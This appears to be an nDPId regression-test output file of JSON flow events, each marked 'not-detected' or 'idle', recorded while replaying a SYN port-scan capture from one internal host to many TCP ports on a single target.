-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3703,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":967,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059962,"flow_last_seen":1278275059962,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":781,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1658,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":783,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059735,"flow_last_seen":1278275059735,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060697,"flow_last_seen":1278275060697,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1577,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16012,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":698,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":749,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1738,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061052,"flow_last_seen":1278275061052,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1816,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16018,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":743,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 